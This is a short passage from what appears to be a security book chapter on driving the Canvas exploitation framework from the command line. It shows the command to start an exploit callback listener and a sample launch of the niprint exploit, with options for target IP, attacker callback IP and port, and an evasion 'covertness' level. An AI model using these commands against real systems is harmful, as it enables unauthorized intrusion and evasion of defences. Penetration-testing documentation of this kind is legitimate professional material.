Using Canvas from the Command Line

A GUI can be convenient, but running from a command line often allows more flexibility and can make it easier to achieve remote tasks. To use the command line, perform the following steps:

  1. Set up the exploit callback listener. From the Canvas directory, use the command:

    python commandlineInterface.py -p [CALLBACK PORT] -v [TARGET OS]

    The -v option currently supports:

    0 LINUXEXECVE
    1 WIN32MOSDEF
    2 LINUXMOSDEF
    3 SOLARISMOSDEF
    4 BSDMOSDEF
    5 OSXMOSDEF
    6 AIXMOSDEF
    7 PHPMULTI
  2. Launch the exploit directly by calling the exploit module in Python; for example, calling the niprint exploit would look like:

    python ./exploits/niprint/niprint.py -v [OS TRAGERT VERSION] -t [TARGET IP] -p [T
    ARGET PORT] -l [ATTACKER IP] -d [CALLBACK PORT] -T[TESTING MODE] -C
    [COVERTNESS LEVEL]

The options are listed in Table 9-3.

Table 9-3. Exploit options and their descriptions

Option

Description

-v

The supported OS version; depends on the exploit.

-t

Target IP address.

-p

Target TCP/UDP port.

-l

Attacker IP reachable from the target.

-d

The call back port (the one given to CommandlineInterface.py).

-T

Test the exploit, but do not run it.

-C

Covertness level; the range is from 1 to 11, where 1 is no evasion and 11 is full evasion.

Warning

Evasion can impact an exploit's reliability, so using more evasion is not always the correct solution. A compromise between evasion and reliability must be found for each target. The covertness level feature is mostly implemented in the transport layer using fragmentation or encoding.